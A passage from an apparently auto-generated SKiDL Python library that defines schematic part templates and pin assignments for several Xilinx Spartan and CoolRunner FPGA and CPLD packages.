Pin(num='28',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='38',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='48',name='IO6P48',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='IO5P58',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='IO5P68',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='88',name='IO4P88',func=Pin.BIDIR,do_erc=True),
Pin(num='98',name='IO4VRP98',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='IO6P29',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='49',name='IO6P49',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='IO5VRP59',func=Pin.BIDIR,do_erc=True),
Pin(num='69',name='IO5P69',func=Pin.BIDIR,do_erc=True),
Pin(num='79',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='89',name='IO4P89',func=Pin.BIDIR,do_erc=True),
Pin(num='99',name='IO4P99',func=Pin.BIDIR,do_erc=True),
Pin(num='100',name='IO4VRP100',func=Pin.BIDIR,do_erc=True),
Pin(num='200',name='IO0VRP200',func=Pin.BIDIR,do_erc=True),
Pin(num='110',name='IO3P110',func=Pin.BIDIR,do_erc=True),
Pin(num='120',name='IO3P120',func=Pin.BIDIR,do_erc=True),
Pin(num='130',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='140',name='IO2P140',func=Pin.BIDIR,do_erc=True),
Pin(num='150',name='IO2VRP150',func=Pin.BIDIR,do_erc=True),
Pin(num='160',name='/CS',func=Pin.BIDIR,do_erc=True),
Pin(num='170',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='180',name='IO1P180',func=Pin.BIDIR,do_erc=True),
Pin(num='190',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='101',name='IO4P101',func=Pin.BIDIR,do_erc=True),
Pin(num='201',name='IO0P201',func=Pin.BIDIR,do_erc=True),
Pin(num='111',name='IO3VRP111',func=Pin.BIDIR,do_erc=True),
Pin(num='121',name='IO3P121',func=Pin.BIDIR,do_erc=True),
Pin(num='131',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='141',name='IO2P141',func=Pin.BIDIR,do_erc=True),
Pin(num='151',name='IO2P151',func=Pin.BIDIR,do_erc=True),
Pin(num='161',name='/WR',func=Pin.BIDIR,do_erc=True),
Pin(num='171',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='181',name='IO1P181',func=Pin.BIDIR,do_erc=True),
Pin(num='191',name='IO0P191',func=Pin.BIDIR,do_erc=True),
Pin(num='102',name='IO4P102',func=Pin.BIDIR,do_erc=True),
Pin(num='202',name='IO0P202',func=Pin.BIDIR,do_erc=True),
Pin(num='112',name='IO3P112',func=Pin.BIDIR,do_erc=True),
Pin(num='122',name='IO3P122',func=Pin.BIDIR,do_erc=True),
Pin(num='132',name='IRDY2',func=Pin.BIDIR,do_erc=True),
Pin(num='142',name='IO2/D2P142',func=Pin.BIDIR,do_erc=True),
Pin(num='152',name='IO2VRP152',func=Pin.BIDIR,do_erc=True),
Pin(num='162',name='IO1VRP162',func=Pin.BIDIR,do_erc=True),
Pin(num='172',name='IO1P172',func=Pin.BIDIR,do_erc=True),
Pin(num='182',name='GCK2',do_erc=True),
Pin(num='192',name='IO0P192',func=Pin.BIDIR,do_erc=True),
Pin(num='103',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='203',name='IO0VRP203',func=Pin.BIDIR,do_erc=True),
Pin(num='113',name='IO3P113',func=Pin.BIDIR,do_erc=True),
Pin(num='123',name='IO3P123',func=Pin.BIDIR,do_erc=True),
Pin(num='133',name='IO2P133',func=Pin.BIDIR,do_erc=True),
Pin(num='143',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='153',name='D0/DIN',func=Pin.BIDIR,do_erc=True),
Pin(num='163',name='IO1P163',func=Pin.BIDIR,do_erc=True),
Pin(num='173',name='IO1P173',func=Pin.BIDIR,do_erc=True),
Pin(num='183',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='193',name='IO0P193',func=Pin.BIDIR,do_erc=True),
Pin(num='104',name='DONE',func=Pin.BIDIR,do_erc=True),
Pin(num='204',name='IO0P204',func=Pin.BIDIR,do_erc=True),
Pin(num='114',name='IO3VRP114',func=Pin.BIDIR,do_erc=True),
Pin(num='124',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='134',name='IO2P134',func=Pin.BIDIR,do_erc=True),
Pin(num='144',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='154',name='BUSY/DOUT',func=Pin.BIDIR,do_erc=True),
Pin(num='164',name='IO1VRP164',func=Pin.BIDIR,do_erc=True),
Pin(num='174',name='IO1P174',func=Pin.BIDIR,do_erc=True),
Pin(num='184',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='194',name='IO0P194',func=Pin.BIDIR,do_erc=True),
Pin(num='105',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='205',name='IO0VRP205',func=Pin.BIDIR,do_erc=True),
Pin(num='115',name='IO3/D6P115',func=Pin.BIDIR,do_erc=True),
Pin(num='125',name='IO3VRP125',func=Pin.BIDIR,do_erc=True),
Pin(num='135',name='IO2/D3P135',func=Pin.BIDIR,do_erc=True),
Pin(num='145',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='155',name='CCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='165',name='IO1P165',func=Pin.BIDIR,do_erc=True),
Pin(num='175',name='IO1P175',func=Pin.BIDIR,do_erc=True),
Pin(num='185',name='GCK3',do_erc=True),
Pin(num='195',name='IO0P195',func=Pin.BIDIR,do_erc=True),
Pin(num='106',name='/PROG',do_erc=True),
Pin(num='206',name='IO0P206',func=Pin.BIDIR,do_erc=True),
Pin(num='116',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='126',name='IO3/D4P126',func=Pin.BIDIR,do_erc=True),
Pin(num='136',name='IO2VRP136',func=Pin.BIDIR,do_erc=True),
Pin(num='146',name='IO2/D1P46',func=Pin.BIDIR,do_erc=True),
Pin(num='156',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='166',name='IO1P166',func=Pin.BIDIR,do_erc=True),
Pin(num='176',name='IO1P176',func=Pin.BIDIR,do_erc=True),
Pin(num='186',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='196',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='107',name='/INIT',func=Pin.BIDIR,do_erc=True),
Pin(num='207',name='TCK',func=Pin.BIDIR,do_erc=True),
Pin(num='117',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='127',name='IO3P127',func=Pin.BIDIR,do_erc=True),
Pin(num='137',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='147',name='IO2VRP147',func=Pin.BIDIR,do_erc=True),
Pin(num='157',name='TDO',func=Pin.BIDIR,do_erc=True),
Pin(num='167',name='IO1VRP167',func=Pin.BIDIR,do_erc=True),
Pin(num='177',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='187',name='IO0P187',func=Pin.BIDIR,do_erc=True),
Pin(num='197',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='108',name='IO3/D7P108',func=Pin.BIDIR,do_erc=True),
Pin(num='208',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='118',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='128',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='138',name='IO2P138',func=Pin.BIDIR,do_erc=True),
Pin(num='148',name='IO2P148',func=Pin.BIDIR,do_erc=True),
Pin(num='158',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='168',name='IO1P168',func=Pin.BIDIR,do_erc=True),
Pin(num='178',name='IO1VRP178',func=Pin.BIDIR,do_erc=True),
Pin(num='188',name='IO0P188',func=Pin.BIDIR,do_erc=True),
Pin(num='198',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='109',name='IO3VRP109',func=Pin.BIDIR,do_erc=True),
Pin(num='119',name='IO3/D5P119',func=Pin.BIDIR,do_erc=True),
Pin(num='129',name='TRDY3',func=Pin.BIDIR,do_erc=True),
Pin(num='139',name='IO2P139',func=Pin.BIDIR,do_erc=True),
Pin(num='149',name='IO2P149',func=Pin.BIDIR,do_erc=True),
Pin(num='159',name='TDI',func=Pin.BIDIR,do_erc=True),
Pin(num='169',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='179',name='IO1P179',func=Pin.BIDIR,do_erc=True),
Pin(num='189',name='IO0VRP189',func=Pin.BIDIR,do_erc=True),
Pin(num='199',name='IO0P199',func=Pin.BIDIR,do_erc=True)]),
Part(name='XC2S300PQ208',dest=TEMPLATE,tool=SKIDL,ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='TMS',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='IO7P3',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='IO7VRP4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='IO7P5',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='IO7VRP6',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='IO7P7',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='IO7P8',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='IO7VRP9',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='IO7VRP10',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='IO7VRP20',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='IO6P30',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='IO6P40',func=Pin.BIDIR,do_erc=True),
Pin(num='50',name='M1',do_erc=True),
Pin(num='60',name='IO5P60',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='IO5P70',func=Pin.BIDIR,do_erc=True),
Pin(num='80',name='GCK0',do_erc=True),
Pin(num='90',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='IO7P11',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='IO7P21',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='IO6VRP31',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='IO6VRP41',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='61',name='IO5P61',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='IO5P71',func=Pin.BIDIR,do_erc=True),
Pin(num='81',name='IO4P81',func=Pin.BIDIR,do_erc=True),
Pin(num='91',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='IO7P22',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='42',name='IO6P42',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='M0',do_erc=True),
Pin(num='62',name='IO5P62',func=Pin.BIDIR,do_erc=True),
Pin(num='72',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='82',name='IO4P82',func=Pin.BIDIR,do_erc=True),
Pin(num='92',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='23',name='IO7P23',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='IO6P33',func=Pin.BIDIR,do_erc=True),
Pin(num='43',name='IO6P43',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='63',name='IO5VRP63',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='IO5VRP73',func=Pin.BIDIR,do_erc=True),
Pin(num='83',name='IO4P83',func=Pin.BIDIR,do_erc=True),
Pin(num='93',name='IO4P93',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='24',name='IRDY7',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='IO6P34',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='IO6P44',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='M2',do_erc=True),
Pin(num='64',name='IO5P64',func=Pin.BIDIR,do_erc=True),
Pin(num='74',name='IO5P74',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='IO4VRP84',func=Pin.BIDIR,do_erc=True),
Pin(num='94',name='IO4VRP94',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='IO7P15',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='35',name='IO6P35',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='IO6VRP45',func=Pin.BIDIR,do_erc=True),
Pin(num='55',name='IO5P55',func=Pin.BIDIR,do_erc=True),
Pin(num='65',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='75',name='IO5P75',func=Pin.BIDIR,do_erc=True),
Pin(num='85',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='95',name='IO4P95',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='IO7P16',func=Pin.BIDIR,do_erc=True),
Pin(num='26',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='36',name='IO6P36',func=Pin.BIDIR,do_erc=True),
Pin(num='46',name='IO6P46',func=Pin.BIDIR,do_erc=True),
Pin(num='56',name='IO5P56',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='76',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='86',name='IO4P86',func=Pin.BIDIR,do_erc=True),
Pin(num='96',name='IO4P96',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='IO7P17',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='TRDY6',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='47',name='IO6VRP47',func=Pin.BIDIR,do_erc=True),
Pin(num='57',name='IO5VRP57',func=Pin.BIDIR,do_erc=True),
Pin(num='67',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='77',name='GCK1',do_erc=True),
Pin(num='87',name='IO4P87',func=Pin.BIDIR,do_erc=True),
Pin(num='97',name='IO4P97',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='IO7P18',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='38',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='48',name='IO6P48',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='IO5P58',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='IO5P68',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='88',name='IO4P88',func=Pin.BIDIR,do_erc=True),
Pin(num='98',name='IO4VRP98',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='29',name='IO6P29',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='49',name='IO6P49',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='IO5VRP59',func=Pin.BIDIR,do_erc=True),
Pin(num='69',name='IO5P69',func=Pin.BIDIR,do_erc=True),
Pin(num='79',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='89',name='IO4P89',func=Pin.BIDIR,do_erc=True),
Pin(num='99',name='IO4P99',func=Pin.BIDIR,do_erc=True),
Pin(num='100',name='IO4VRP100',func=Pin.BIDIR,do_erc=True),
Pin(num='200',name='IO0P200',func=Pin.BIDIR,do_erc=True),
Pin(num='110',name='IO3P110',func=Pin.BIDIR,do_erc=True),
Pin(num='120',name='IO3/D5P120',func=Pin.BIDIR,do_erc=True),
Pin(num='130',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='140',name='IO2P140',func=Pin.BIDIR,do_erc=True),
Pin(num='150',name='IO2VRP150',func=Pin.BIDIR,do_erc=True),
Pin(num='160',name='/CS',func=Pin.BIDIR,do_erc=True),
Pin(num='170',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='180',name='IO1P180',func=Pin.BIDIR,do_erc=True),
Pin(num='190',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='101',name='IO4P101',func=Pin.BIDIR,do_erc=True),
Pin(num='201',name='IO0P201',func=Pin.BIDIR,do_erc=True),
Pin(num='111',name='IO3VRP111',func=Pin.BIDIR,do_erc=True),
Pin(num='121',name='IO3P121',func=Pin.BIDIR,do_erc=True),
Pin(num='131',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='141',name='IO2/D2P141',func=Pin.BIDIR,do_erc=True),
Pin(num='151',name='IO2P151',func=Pin.BIDIR,do_erc=True),
Pin(num='161',name='/WR',func=Pin.BIDIR,do_erc=True),
Pin(num='171',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='181',name='IO1P181',func=Pin.BIDIR,do_erc=True),
Pin(num='191',name='IO0P191',func=Pin.BIDIR,do_erc=True),
Pin(num='102',name='IO4P102',func=Pin.BIDIR,do_erc=True),
Pin(num='202',name='IO0P202',func=Pin.BIDIR,do_erc=True),
Pin(num='112',name='IO3P112',func=Pin.BIDIR,do_erc=True),
Pin(num='122',name='IO3P122',func=Pin.BIDIR,do_erc=True),
Pin(num='132',name='IRDY2',func=Pin.BIDIR,do_erc=True),
Pin(num='142',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='152',name='IO2VRP152',func=Pin.BIDIR,do_erc=True),
Pin(num='162',name='IO1VRP162',func=Pin.BIDIR,do_erc=True),
Pin(num='172',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='182',name='GCK2',do_erc=True),
Pin(num='192',name='IO0P192',func=Pin.BIDIR,do_erc=True),
Pin(num='103',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='203',name='IO0VRP203',func=Pin.BIDIR,do_erc=True),
Pin(num='113',name='IO3P113',func=Pin.BIDIR,do_erc=True),
Pin(num='123',name='IO3P123',func=Pin.BIDIR,do_erc=True),
Pin(num='133',name='IO2P133',func=Pin.BIDIR,do_erc=True),
Pin(num='143',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='153',name='D0/DIN',func=Pin.BIDIR,do_erc=True),
Pin(num='163',name='IO1P163',func=Pin.BIDIR,do_erc=True),
Pin(num='173',name='IO1P173',func=Pin.BIDIR,do_erc=True),
Pin(num='183',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='193',name='IO0P193',func=Pin.BIDIR,do_erc=True),
Pin(num='104',name='DONE',func=Pin.BIDIR,do_erc=True),
Pin(num='204',name='IO0P204',func=Pin.BIDIR,do_erc=True),
Pin(num='114',name='IO3P114',func=Pin.BIDIR,do_erc=True),
Pin(num='124',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='134',name='IO2P134',func=Pin.BIDIR,do_erc=True),
Pin(num='144',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='154',name='BUSY/DOUT',func=Pin.BIDIR,do_erc=True),
Pin(num='164',name='IO1VRP164',func=Pin.BIDIR,do_erc=True),
Pin(num='174',name='IO1P174',func=Pin.BIDIR,do_erc=True),
Pin(num='184',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='194',name='IO0P194',func=Pin.BIDIR,do_erc=True),
Pin(num='105',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='205',name='IO0VRP205',func=Pin.BIDIR,do_erc=True),
Pin(num='115',name='IO3VRP115',func=Pin.BIDIR,do_erc=True),
Pin(num='125',name='IO3VRP125',func=Pin.BIDIR,do_erc=True),
Pin(num='135',name='IO2/D3P135',func=Pin.BIDIR,do_erc=True),
Pin(num='145',name='IO2/D1P145',func=Pin.BIDIR,do_erc=True),
Pin(num='155',name='CCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='165',name='IO1P165',func=Pin.BIDIR,do_erc=True),
Pin(num='175',name='IO1P175',func=Pin.BIDIR,do_erc=True),
Pin(num='185',name='GCK3',do_erc=True),
Pin(num='195',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='106',name='/PROG',do_erc=True),
Pin(num='206',name='IO0P206',func=Pin.BIDIR,do_erc=True),
Pin(num='116',name='IO3/D6P116',func=Pin.BIDIR,do_erc=True),
Pin(num='126',name='IO3/D4P126',func=Pin.BIDIR,do_erc=True),
Pin(num='136',name='IO2VRP136',func=Pin.BIDIR,do_erc=True),
Pin(num='146',name='IO2VRP146',func=Pin.BIDIR,do_erc=True),
Pin(num='156',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='166',name='IO1P166',func=Pin.BIDIR,do_erc=True),
Pin(num='176',name='IO1P176',func=Pin.BIDIR,do_erc=True),
Pin(num='186',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='196',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='107',name='/INIT',func=Pin.BIDIR,do_erc=True),
Pin(num='207',name='TCK',func=Pin.BIDIR,do_erc=True),
Pin(num='117',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='127',name='IO3P127',func=Pin.BIDIR,do_erc=True),
Pin(num='137',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='147',name='IO2P147',func=Pin.BIDIR,do_erc=True),
Pin(num='157',name='TDO',func=Pin.BIDIR,do_erc=True),
Pin(num='167',name='IO1P167',func=Pin.BIDIR,do_erc=True),
Pin(num='177',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='187',name='IO0P187',func=Pin.BIDIR,do_erc=True),
Pin(num='197',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='108',name='IO3/D7P108',func=Pin.BIDIR,do_erc=True),
Pin(num='208',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='118',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='128',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='138',name='IO2P138',func=Pin.BIDIR,do_erc=True),
Pin(num='148',name='IO2P148',func=Pin.BIDIR,do_erc=True),
Pin(num='158',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='168',name='IO1VRP168',func=Pin.BIDIR,do_erc=True),
Pin(num='178',name='IO1VRP178',func=Pin.BIDIR,do_erc=True),
Pin(num='188',name='IO0P188',func=Pin.BIDIR,do_erc=True),
Pin(num='198',name='IO0P198',func=Pin.BIDIR,do_erc=True),
Pin(num='109',name='IO3VRP109',func=Pin.BIDIR,do_erc=True),
Pin(num='119',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='129',name='TRDY3',func=Pin.BIDIR,do_erc=True),
Pin(num='139',name='IO2P139',func=Pin.BIDIR,do_erc=True),
Pin(num='149',name='IO2P149',func=Pin.BIDIR,do_erc=True),
Pin(num='159',name='TDI',func=Pin.BIDIR,do_erc=True),
Pin(num='169',name='IO1P169',func=Pin.BIDIR,do_erc=True),
Pin(num='179',name='IO1P179',func=Pin.BIDIR,do_erc=True),
Pin(num='189',name='IO0VRP189',func=Pin.BIDIR,do_erc=True),
Pin(num='199',name='IO0VRP199',func=Pin.BIDIR,do_erc=True)]),
Part(name='XC2S400FT256',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC2S50-PQ208',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC2S64A-xQFG48',dest=TEMPLATE,tool=SKIDL,description='Xilinx CoolRunner',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GTS0',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='GTS1',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='VCCjtag',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='A3',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='A2',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='B1',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='B2',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='B3',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='B4',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='B5',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='D7',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='D16',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='11',name='GCK0',func=Pin.PASSIVE,do_erc=True),
Pin(num='21',name='TDI',do_erc=True),
Pin(num='31',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='41',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='GCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='TMS',do_erc=True),
Pin(num='32',name='C15',func=Pin.BIDIR,do_erc=True),
Pin(num='42',name='VCCio2',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='GCK2',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='TCK',do_erc=True),
Pin(num='33',name='C14',func=Pin.BIDIR,do_erc=True),
Pin(num='43',name='C3',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='B12',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='D10',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='C12',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='C2',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='B13',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='D11',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='C11',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='C1',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='D12',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='C10',func=Pin.BIDIR,do_erc=True),
Pin(num='46',name='GSR',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='D1',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='D13',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='C9',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='GTS2',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='D2',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='D13',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='C6',func=Pin.BIDIR,do_erc=True),
Pin(num='48',name='GTS3',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='VCCio1',func=Pin.PWRIN,do_erc=True),
Pin(num='29',name='VCCint',func=Pin.PWRIN,do_erc=True),
Pin(num='39',name='C5',func=Pin.BIDIR,do_erc=True)]),
Part(name='XC3020-PC68',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['XC3030-PC68']),
Part(name='XC3030-PC44',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC3030-PC84',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['XC3042-PC84']),
Part(name='XC3030-VQ100',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC3042-VQ100',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC3S1400A/FG484',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC3S200AN/FT256',dest=TEMPLATE,tool=SKIDL,description='BGA256/1mm',ref_prefix='U',num_units=1,fplist=['BGA256'],do_erc=True,pins=[
Pin(num='A1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='B1',name='TDI',do_erc=True),
Pin(num='C1',name='IO_L01N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='D1',name='IO_L03P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='E1',name='IO_L03N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='F1',name='IO_L08P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='G1',name='IO_L08N_3/VREF_3',func=Pin.BIDIR,do_erc=True),
Pin(num='H1',name='IO_L11N_3/LHCLK1',func=Pin.BIDIR,do_erc=True),
Pin(num='J1',name='IO_L14N_3/LHCLK5',func=Pin.BIDIR,do_erc=True),
Pin(num='K1',name='IO_L15N_3/LHCLK7',func=Pin.BIDIR,do_erc=True),
Pin(num='L1',name='IO_L16P_3/VREF_3',func=Pin.BIDIR,do_erc=True),
Pin(num='M1',name='IO_L20P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='N1',name='IO_L20N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='P1',name='IO_L22N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='R1',name='IO_L23P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='T1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='A2',name='/PROG',func=Pin.BIDIR,do_erc=True),
Pin(num='B2',name='TMS',do_erc=True),
Pin(num='C2',name='IO_L01P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='D2',name='VCCO3',func=Pin.PASSIVE,do_erc=True),
Pin(num='E2',name='IO_L05N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='F2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='G2',name='IO_L11P_3/LHCLK0',func=Pin.BIDIR,do_erc=True),
